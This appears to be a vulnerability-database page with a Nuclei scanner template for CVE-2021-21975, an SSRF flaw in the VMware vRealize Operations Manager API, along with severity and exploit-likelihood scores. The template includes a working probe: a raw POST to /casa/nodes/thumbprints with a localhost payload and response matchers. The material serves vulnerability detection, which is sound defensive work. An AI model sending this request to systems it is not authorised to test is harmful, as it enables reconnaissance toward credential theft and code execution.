Lucene search

K
nuclei
ProjectDiscoveryNUCLEI:CVE-2021-21975
HistoryMar 30, 2021 - 11:43 p.m.

vRealize Operations Manager API - Server-Side Request Forgery

2021-03-3023:43:36
ProjectDiscovery
github.com
3

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

Low

8.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:N/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.

id: CVE-2021-21975

info:
  name: vRealize Operations Manager API - Server-Side Request Forgery
  author: luci
  severity: high
  description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.
  remediation: |
    Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
    - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-21975
    cwe-id: CWE-918
    epss-score: 0.96694
    epss-percentile: 0.99569
    cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: cloud_foundation
  tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize

http:
  - raw:
      - |
        POST /casa/nodes/thumbprints HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        ["127.0.0.1:443/ui/"]

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'vRealize Operations Manager'
          - 'thumbprint'
          - 'address'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dbd882e8580bb92aba980917dec07a0ecad6b313017de33899a7bdf2d8ef04840220568bc3c9912731ec942471e6c36606a29575dd3c9687cb0df9e10c2b82f6a1b9:922c64590222798bb761d5b6d8e72950
How to protect your server from attacks?

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

Low

8.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:N/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

Related for NUCLEI:CVE-2021-21975